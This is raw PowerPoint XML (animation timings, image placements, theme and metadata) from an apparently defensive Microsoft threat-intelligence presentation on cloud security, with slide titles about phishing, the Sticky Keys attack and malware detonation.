                            <p:stCondLst>
                              <p:cond delay="4000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="78" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="50"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="80" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4250"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="81" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="after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par>
                          <p:cTn id="84" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4750"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="85" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="86" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="87" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="88" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="89" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="90" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="91" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="92" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="93" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="94" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="95" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="50"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="96"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SEA Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="155580" y="3412059"/>
            <a:ext cx="9505950" cy="3333750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="160343" y="2106613"/>
            <a:ext cx="6546905" cy="4639196"/>
            <a:chOff x="725965" y="1421191"/>
            <a:chExt cx="6546905" cy="4639196"/>
          </a:xfrm>
        </p:grpSpPr>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37" y="1973262"/>
              <a:ext cx="6541033" cy="408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725965" y="1421191"/>
              <a:ext cx="6526268" cy="552071"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6916425" y="2106613"/>
            <a:ext cx="5429250" cy="3305175"/>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6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4762560" y="3725862"/>
            <a:ext cx="7648575" cy="2905125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="427037" y="1196783"/>
            <a:ext cx="5290807"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Phish for Credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7511430" y="1222350"/>
            <a:ext cx="4100803"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Reconnaissance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178362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theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="8-50009_MSTIC_PPT_Template_Light">
  <a:themeElements>
    <a:clrScheme name="MSTIC">
      <a:dk1>
        <a:srgbClr val="505050"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="00188F"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="EAEAEA"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="0078D7"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="00BCF2"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="008272"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="002050"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FFB900"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="A80000"/>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TIC_Template_16x9.potx" id="{E54F3677-C9AE-4121-8975-1B0B050438EF}" vid="{7655FF58-2C1E-4099-B563-219E90E72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MSTIC_Template_16x9</Template>
  <TotalTime>0</TotalTime>
  <Words>3103</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>453</Paragraphs>
  <Slides>36</Slides>
  <Notes>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Calibri</vt:lpstr>
      <vt:lpstr>Cambria Math</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>Segoe UI Light</vt:lpstr>
      <vt:lpstr>Segoe UI Semibold</vt:lpstr>
      <vt:lpstr>Segoe UI Semilight</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>8-50009_MSTIC_PPT_Template_Light</vt:lpstr>
      <vt:lpstr>Cyber in a World of Cloud  …and the new physics of defense</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cyber &amp; Cloud Providers</vt:lpstr>
      <vt:lpstr>Tenants bring their adversaries with them</vt:lpstr>
      <vt:lpstr>Tracking Adversaries</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SEA Attack</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Azure Active Directory Geo-Anomalous Login Detection</vt:lpstr>
      <vt:lpstr>Innovate in defense by harnessing economic trends</vt:lpstr>
      <vt:lpstr>The “Sticky Keys” Attack</vt:lpstr>
      <vt:lpstr>Sticky Keys Attack in Azure [MS Subscriptions]</vt:lpstr>
      <vt:lpstr>Examine Logins</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Microsoft Threat Intelligence System </vt:lpstr>
      <vt:lpstr>We can use the cloud to protect itself</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Why Detonation?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Environment Vetting</vt:lpstr>
      <vt:lpstr>Geo IP Evasion</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Where does Detonation Fit in?</vt:lpstr>
      <vt:lpstr>Multiple-layer Detection Approach </vt:lpstr>
      <vt:lpstr>Learning from other Cloud services</vt:lpstr>
      <vt:lpstr>One Cloud Service Helps Another…</vt:lpstr>
      <vt:lpstr>Customer Engagement </vt:lpstr>
      <vt:lpstr>Wrap Up</vt:lpstr>
      <vt:lpstr>Wrap up</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2017-02-08T18:33:07Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-02-08T18:34:11Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>